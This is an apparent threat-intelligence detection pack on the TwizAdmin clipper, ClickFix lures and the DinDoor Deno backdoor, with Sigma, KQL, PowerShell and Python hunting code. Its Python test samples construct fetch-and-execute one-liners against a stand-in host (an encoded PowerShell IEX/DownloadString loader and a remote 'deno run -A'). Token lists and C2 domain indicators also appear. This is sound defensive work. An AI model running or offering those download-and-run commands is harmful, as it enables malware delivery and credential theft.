
TwizAdmin & DinDoor Operations: Multi-Platform Clipping, ClickFix, and Deno Runtime Abuse — Enterprise Detection Pack

Security Arsenal Team
April 24, 2026

Current OTX pulses indicate a convergence of sophisticated threats targeting endpoints through diverse vectors. The TwizAdmin operation (attributed to the actor DataBreachPlus) is a mature Malware-as-a-Service (MaaS) ecosystem that combines cryptocurrency clippers, infostealers (BIP-39 seed phrases, browser credentials) and ransomware (crpx0), delivered via FedEx-themed lures. In parallel, ClickFix campaigns use social engineering to get victims to execute malicious commands themselves in native system tools, delivering stealers such as Lumma, Vidar and RedLine and remote-access tooling such as NetSupport RAT. Finally, the MuddyWater APT group is deploying the DinDoor backdoor, which abuses the Deno runtime to execute obfuscated JavaScript for C2 and host fingerprinting, a sign of the broader trend toward abusing unconventional runtimes for evasion.

Threat Actor / Malware Profile

TwizAdmin (DataBreachPlus)

  • Distribution: Phishing campaigns impersonating FedEx/Shipping services targeting Windows and macOS.
  • Payload Behavior: Multi-stage payload involving a Java RAT and a FastAPI-based C2 panel. Performs clipboard hijacking for 8+ crypto chains and steals BIP-39 seed phrases.
  • C2 Communication: FastAPI panel on port 1337; utilizes license keys for operational management.
  • Persistence: Not detailed in the pulses. The "managed via panel" wording implies the mechanisms typical of Java RATs (Run keys, scheduled tasks), so treat those as hunt starting points rather than confirmed indicators.
  • Anti-Analysis: Not detailed in the pulses. License-key verification against the panel and standard binary obfuscation are the likely controls; a sample that cannot reach the panel to validate its key will typically not detonate in a sandbox.
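The clipper behaviour described above is easiest to reason about as a timeline of clipboard-owner changes: the user copies a wallet address in one application and, a fraction of a second later, a different process overwrites it with an attacker address of the same chain. The following is an added example, not TwizAdmin code or pulse data: it classifies clipboard text by chain using simplified address patterns (an assumption, since the page names no specific chains) and flags exactly that swap pattern. The timeline, process names and addresses are constructed; the addresses are documentation examples, not indicators.

```python
"""Flag crypto-clipper swaps in a timeline of clipboard-owner changes (constructed data)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Simplified address shapes per chain. Assumption: the page only says "8+ chains", so this
# covers common ones; real clippers also target DOGE, BCH, SOL, XRP and others.
CHAIN_PATTERNS = {
    "BTC": re.compile(r"^(?:bc1[qp][02-9ac-hj-np-z]{25,87}|[13][1-9A-HJ-NP-Za-km-z]{25,34})$"),
    "ETH": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "LTC": re.compile(r"^(?:ltc1[02-9ac-hj-np-z]{25,87}|[LM][1-9A-HJ-NP-Za-km-z]{26,33})$"),
    "TRX": re.compile(r"^T[1-9A-HJ-NP-Za-km-z]{33}$"),
    "XMR": re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$"),
}


@dataclass(frozen=True)
class ClipEvent:
    ts: float     # seconds since the monitor started
    owner: str    # process that set the clipboard (what GetClipboardOwner would resolve to on Windows)
    text: str


def classify(text: str) -> Optional[str]:
    """Return the chain whose address pattern the clipboard text matches, else None."""
    s = text.strip()
    for chain, pat in CHAIN_PATTERNS.items():
        if pat.match(s):
            return chain
    return None


def find_clipper_swaps(events: List[ClipEvent], window_s: float = 3.0) -> List[Tuple[str, str, str, str]]:
    """Return (chain, original, replacement, replacing_process) for every address that a
    *different* process overwrote with another address of the same chain within window_s
    seconds. A user re-copying a second address in the same application is not a swap."""
    swaps = []
    ordered = sorted(events, key=lambda e: e.ts)
    for i, orig in enumerate(ordered):
        chain = classify(orig.text)
        if chain is None:
            continue
        for later in ordered[i + 1:]:
            if later.ts - orig.ts > window_s:
                break
            if (later.owner.lower() != orig.owner.lower()
                    and classify(later.text) == chain
                    and later.text.strip() != orig.text.strip()):
                swaps.append((chain, orig.text.strip(), later.text.strip(), later.owner))
                break
    return swaps


# Constructed timeline: the user copies in the browser and javaw.exe (standing in for the
# Java RAT) overwrites the clipboard shortly afterwards. Addresses are documentation examples.
USER_BTC = "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq"
ATTACKER_BTC = "bc1qxy2kgdygjrsqtzq2n0yrf2493p83kkfjhx0wlh"
USER_ETH = "0x742d35Cc6634C0532925a3b844Bc454e4438f44e"
ATTACKER_ETH = "0x" + "ab" * 20

SAMPLE_TIMELINE = [
    ClipEvent(0.0, "chrome.exe", USER_BTC),
    ClipEvent(0.4, "javaw.exe", ATTACKER_BTC),       # swap: same chain, other address, other process
    ClipEvent(12.0, "explorer.exe", "quarterly report.docx"),
    ClipEvent(30.0, "chrome.exe", USER_ETH),
    ClipEvent(30.3, "javaw.exe", ATTACKER_ETH),      # swap
    ClipEvent(60.0, "chrome.exe", USER_ETH),
    ClipEvent(61.0, "chrome.exe", ATTACKER_ETH),     # same owner: the user copied two addresses, not a swap
    ClipEvent(90.0, "chrome.exe", USER_BTC),
    ClipEvent(99.0, "javaw.exe", ATTACKER_BTC),      # outside the window: not attributed to a clipper
]


def run_sample() -> List[Tuple[str, str, str, str]]:
    return find_clipper_swaps(SAMPLE_TIMELINE)


if __name__ == "__main__":
    for chain, before, after, proc in run_sample():
        print(f"[!] {chain} address swapped by {proc}: {before} -> {after}")
```

On a live host the events would come from a clipboard listener (AddClipboardFormatListener plus GetClipboardOwner on Windows). The signal is the overwrite by another owner inside the window; the regexes only decide which clipboard contents are worth comparing, so keep them loose rather than exact.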

ClickFix (Unknown)

  • Distribution: Social engineering campaigns impersonating Intuit QuickBooks, Booking.com, and others.
  • Payload Behavior: Living-off-the-Land (LotL) technique; manipulates victims into running malicious commands in native tools (PowerShell/Terminal) to download payloads like Lumma Stealer, Vidar, Redline, and NetSupport RAT.
  • C2 Communication: Varies based on the specific stealer family deployed.
  • Persistence: Established by the secondary payload (e.g., Scheduled Tasks for stealers).
  • Anti-Analysis: Heavy use of obfuscation in the delivered shell commands.

DinDoor (MuddyWater)

  • Distribution: Malicious MSI files, often delivered via spear-phishing.
  • Payload Behavior: Abuses the Deno JavaScript/TypeScript runtime. Executes obfuscated JavaScript; one variant writes to disk, another runs entirely in-memory.
  • C2 Communication: Uses HTTPS for C2; employs specific fingerprinting algorithms to generate unique victim IDs.
  • Persistence: Established through the MSI installation; registry Run keys pointing at the Deno process are plausible but not confirmed in the pulses.
  • Anti-Analysis: Memory-only execution capabilities and code obfuscation within the Deno runtime.

IOC Analysis

  • Indicator Types: The pulses provide a mix of IPv4 addresses (C2 infrastructure), Domains (C2 and Phishing), URLs (Payload hosting), and File Hashes (SHA256, MD5, SHA1 of malware samples).
  • Operationalization: SOC teams should import the domains and IPs into firewall blocklists and EDLs (External Dynamic Lists). File hashes belong in EDR custom-IOC blocklists for prevention; a malware hash must never be added to an exclusion or allowlist. The hashes correspond to the TwizAdmin payloads and DinDoor MSI droppers.
  • Detection Coverage: Network logs (firewall/proxy) will catch the domain and IP IOCs. EDR solutions (CrowdStrike, SentinelOne, Elastic) are required for the file-hash IOCs and for process behaviours such as Deno execution.

Detection Engineering

YAML
title: Potential Deno Runtime Abuse - DinDoor Backdoor
id: 4e8b3c2d-1a5f-4b6e-9c7d-8f9a0b1c2d3e
description: Detects execution of the Deno runtime with the run or eval subcommand. The DinDoor backdoor (MuddyWater) abuses Deno to execute obfuscated JavaScript; Deno is not standard on most enterprise Windows endpoints, so any execution outside developer hosts deserves triage.
status: experimental
date: 2026-04-24
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection_deno:
    Image|endswith: '\deno.exe'
  selection_args:
    # Subcommands DinDoor needs to execute a script (on-disk or in-memory). Kept as a separate
    # selection so the AND with the image match is explicit.
    CommandLine|contains:
      - ' run '
      - ' eval '
  condition: selection_deno and selection_args
falsepositives:
  - Developer workstations with Deno installed (rare in enterprise; scope by host group)
level: high
tags:
  - attack.execution
  - attack.t1059.007
---
title: Suspicious Shell Execution via ClickFix Technique
id: 5f9c4d3e-2b6a-5c7f-0d8e-9a1b2c3d4e5f
description: Detects the ClickFix pattern - a command interpreter launched from the Win+R Run dialog (parent explorer.exe) or directly by a browser, with a command line that downloads, decodes or evaluates a second stage. The lure tells the victim to paste a pre-copied one-liner, so the parent is usually explorer.exe rather than the browser itself.
status: experimental
date: 2026-04-24
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\explorer.exe'
      - '\chrome.exe'
      - '\firefox.exe'
      - '\msedge.exe'
      - '\brave.exe'
  selection_child:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
      - '\cmd.exe'
      - '\mshta.exe'
  selection_payload:
    CommandLine|contains:
      - 'FromBase64String'
      - 'IEX '
      - 'Invoke-Expression'
      - 'DownloadString'
      - 'Invoke-WebRequest'
      - 'irm '
      - 'iwr '
      - '-EncodedCommand'
      - ' -enc '
      - 'mshta http'
  condition: all of selection_*
falsepositives:
  - Administrators pasting download one-liners into the Run dialog
  - Legitimate web-based troubleshooting tools (rare)
level: high
tags:
  - attack.execution
  - attack.t1204.004
  - attack.t1059.001
---
title: Network Connection to Non-Standard Port 1337 (TwizAdmin C2)
id: 6a0d5e4f-3c7b-6d8a-1e9f-0b2c3d4e5f6a
description: Detects outbound connections to TCP port 1337, the port the TwizAdmin FastAPI C2 panel listens on. Port-only matching is weak on its own; correlate with the initiating process (Java) or with the C2 domains and IPs from the pulses before escalating.
status: experimental
date: 2026-04-24
author: Security Arsenal
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    DestinationPort: 1337
    Initiated: 'true'
  filter_internal:
    # Internal dev servers and game hosts are the main noise source
    DestinationIp|cidr:
      - '10.0.0.0/8'
      - '172.16.0.0/12'
      - '192.168.0.0/16'
  condition: selection and not filter_internal
falsepositives:
  - Development servers or games using this port on the internet
level: medium
tags:
  - attack.command_and_control
  - attack.t1571
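To sanity-check the logic of the three rules above without a SIEM, here is an added example (not part of the page's detection pack) that reimplements them in Python over constructed process-creation and network events. It goes beyond the Sigma rules in two ways that matter for ClickFix: it treats explorer.exe as a parent (the Win+R Run dialog path) and it decodes -EncodedCommand, so a base64-wrapped download one-liner still trips the obfuscation tokens. Field names, the sample command lines and the c2.invalid hosts are constructed.

```python
"""Offline replay of the Deno, ClickFix and port-1337 rules over constructed events."""
import base64
import re
from dataclasses import dataclass
from typing import List


@dataclass
class Event:
    kind: str                 # "process" or "network"
    image: str = ""
    parent: str = ""
    cmdline: str = ""
    dst_port: int = 0
    initiated: bool = False


BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "brave.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Tokens from the ClickFix rule plus the shorthand download cmdlets common in pasted lures.
OBF_TOKENS = ("frombase64string", "iex ", "invoke-expression", "downloadstring",
              "irm ", "iwr ", "invoke-webrequest")
# Deno permission flags that hand the script network, process or disk access.
DENO_RISKY_FLAGS = {"-a", "--allow-all", "--allow-net", "--allow-run", "--allow-write"}
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the cleartext behind -EncodedCommand (UTF-16LE base64), or '' if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def detect(ev: Event) -> List[str]:
    """Return the names of the rules the event trips (empty list means clean)."""
    hits: List[str] = []
    if ev.kind == "network":
        if ev.initiated and ev.dst_port == 1337:
            hits.append("port_1337_c2")
        return hits
    img, parent = basename(ev.image), basename(ev.parent)
    tokens = [t.lower() for t in ev.cmdline.split()]
    # Rule 1: Deno run/eval; remote module specifiers and broad permission grants add weight.
    if img == "deno.exe" and len(tokens) > 1 and tokens[1] in ("run", "eval"):
        hits.append("deno_runtime")
        if any(t in DENO_RISKY_FLAGS for t in tokens) or any(t.startswith(("http://", "https://")) for t in tokens):
            hits.append("deno_remote_or_overprivileged")
    # Rule 2: ClickFix. The pasted one-liner lands in Win+R (parent explorer.exe) or a browser-spawned
    # shell and often hides its download behind -EncodedCommand, so decode before token matching.
    if img in SHELLS and (parent in BROWSERS or parent == "explorer.exe"):
        decoded = decode_encoded_command(ev.cmdline)
        haystack = (ev.cmdline + " " + decoded).lower()
        if any(tok in haystack for tok in OBF_TOKENS):
            hits.append("clickfix_shell")
            if decoded:
                hits.append("encoded_command_decoded")
    return hits


# Constructed samples. The encoded payload is built here, not captured from an incident.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/loader.ps1')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLES = [
    Event("process", image=r"C:\Users\u\AppData\Local\deno\deno.exe", parent=r"C:\Windows\System32\msiexec.exe",
          cmdline="deno.exe run -A https://c2.invalid/bootstrap.js"),
    Event("process", image=_PS, parent=r"C:\Windows\explorer.exe",
          cmdline=f"powershell.exe -w hidden -enc {_ENC}"),
    Event("process", image=_PS, parent=r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          cmdline='powershell.exe -NoP -c "IEX (irm http://c2.invalid/a)"'),
    Event("process", image=_PS, parent=r"C:\Windows\explorer.exe",
          cmdline=r"powershell.exe -NoProfile -File C:\tools\backup.ps1"),      # benign: no download/eval tokens
    Event("network", image=r"C:\Program Files\Java\bin\javaw.exe", dst_port=1337, initiated=True),
    Event("network", image=r"C:\Program Files\Java\bin\javaw.exe", dst_port=443, initiated=True),
]


def run_samples() -> List[List[str]]:
    return [detect(ev) for ev in SAMPLES]


if __name__ == "__main__":
    for ev, hits in zip(SAMPLES, run_samples()):
        print(f"{hits or ['clean']}: {basename(ev.image)} {ev.cmdline[:60]}")
```

The second sample is the one to study: its raw command line contains none of the rule's tokens, so the Sigma version above only catches it through the '-enc' string, while the decoded payload exposes both IEX and DownloadString. Feed the same decode step into your SIEM's enrichment if it supports it.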

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for Deno runtime execution, ClickFix-style shells, Java launchers, and TwizAdmin C2 traffic
let lookback = 7d;
let c2_domains = dynamic(["fanonlyatn.xyz", "ineracaspsl.site", "serialmenot.com", "ustazazharidrus.com", "account-help.info"]);
DeviceProcessEvents
| where Timestamp > ago(lookback)
| where (FileName =~ "deno.exe" and ProcessCommandLine has_any ("run", "eval"))                        // DinDoor
    or (FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")                             // ClickFix: Run dialog or browser parent
        and InitiatingProcessFileName in~ ("explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe")
        and ProcessCommandLine has_any ("FromBase64String", "IEX", "Invoke-Expression", "DownloadString", "irm", "iwr", "-enc", "-EncodedCommand"))
    or (FileName in~ ("java.exe", "javaw.exe") and ProcessCommandLine contains ".jar")                 // TwizAdmin Java RAT launch (noisy on dev hosts)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, FileName, FolderPath, ProcessCommandLine
| union (
    DeviceNetworkEvents
    | where Timestamp > ago(lookback)
    | where RemotePort == 1337 or RemoteUrl has_any (c2_domains)
    | project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort
)
| order by Timestamp desc

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    Hunt script for TwizAdmin, ClickFix artifacts, and DinDoor backdoors.
.DESCRIPTION
    Checks for running Deno/Java processes, established connections to port 1337,
    registry Run-key persistence, suspicious scheduled-task actions, and recently written
    .js/.jar/.msi files in user-writable locations. Run elevated for full coverage.
#>

Write-Host "[+] Hunting for DinDoor (Deno) and TwizAdmin (Java/Clipper) artifacts..."

# 1. Running processes. Deno should not exist on most enterprise hosts; Java is noisy,
#    so the path and command line are shown for triage rather than treated as a verdict.
$suspiciousProcs = @("deno", "java", "javaw")
$found = Get-CimInstance Win32_Process |
    Where-Object { $suspiciousProcs -contains ($_.Name -replace '\.exe$', '') } |
    Select-Object Name, ProcessId, ExecutablePath, CommandLine

if ($found) {
    Write-Host "[!] WARNING: Found suspicious running processes:" -ForegroundColor Red
    $found | Format-Table -AutoSize -Wrap
} else {
    Write-Host "[-] No Deno/Java processes detected running." -ForegroundColor Green
}

# 2. Established connections to the TwizAdmin panel port (1337), with the owning process
$c2Conns = Get-NetTCPConnection -RemotePort 1337 -State Established -ErrorAction SilentlyContinue
foreach ($c in $c2Conns) {
    $owner = (Get-Process -Id $c.OwningProcess -ErrorAction SilentlyContinue).ProcessName
    Write-Host "[!] Connection to $($c.RemoteAddress):1337 from PID $($c.OwningProcess) ($owner)" -ForegroundColor Red
}

# 3. Registry Run keys: script/JAR/MSI launchers, Deno, or a direct URL in the value
$runPaths = @(
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
)
$runPattern = '\.js\b|\bdeno\b|https?://|\.jar\b|\.msi\b'

Write-Host "[+] Scanning Registry Run Keys for suspicious persistence..."
foreach ($path in $runPaths) {
    if (-not (Test-Path $path)) { continue }
    $props = Get-ItemProperty -Path $path -ErrorAction SilentlyContinue
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip PSPath, PSParentPath, PSChildName, PSDrive, PSProvider
        if ($p.Value -is [string] -and $p.Value -match $runPattern) {
            Write-Host "[!] Suspicious entry in $path : $($p.Name) = $($p.Value)" -ForegroundColor Yellow
        }
    }
}

# 4. Scheduled tasks whose action runs a script, JAR, MSI, Deno, or a URL
Write-Host "[+] Scanning scheduled tasks for suspicious actions..."
Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
    $task = $_
    foreach ($a in $task.Actions) {
        $cmd = "$($a.Execute) $($a.Arguments)"
        if ($cmd -match $runPattern) {
            Write-Host "[!] Suspicious task $($task.TaskPath)$($task.TaskName): $cmd" -ForegroundColor Yellow
        }
    }
}

# 5. Recently written .js/.jar/.msi files in user-writable staging directories
$pathsToScan = @($env:TEMP, $env:APPDATA, $env:LOCALAPPDATA)
Write-Host "[+] Scanning user directories for .js/.jar/.msi files written in the last 7 days..."
$recentFiles = Get-ChildItem -Path $pathsToScan -Include *.js, *.jar, *.msi -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) }
if ($recentFiles) {
    Write-Host "[!] Found recently written script/jar/msi files:" -ForegroundColor Yellow
    $recentFiles | Select-Object FullName, LastWriteTime | Format-Table -AutoSize
} else {
    Write-Host "[-] No recent .js/.jar/.msi files in the scanned directories." -ForegroundColor Green
}


Response Priorities

  • Immediate: Block all listed IOCs (domains and IPs) at the network perimeter. Hunt for deno.exe executions and for Java processes with established connections to port 1337.
  • 24h: If credential theft (Lumma, Vidar, RedLine) is suspected, enforce password resets for privileged accounts, revoke browser sessions, and rotate exposed API keys. A stolen BIP-39 seed phrase cannot be rotated; move the funds to a wallet generated from a fresh seed.
  • 1 Week: Review and harden application allowlisting so unauthorized runtimes such as Deno cannot execute. Run security awareness training focused on ClickFix-style social engineering (fake browser errors and verification prompts that ask the user to paste a command).
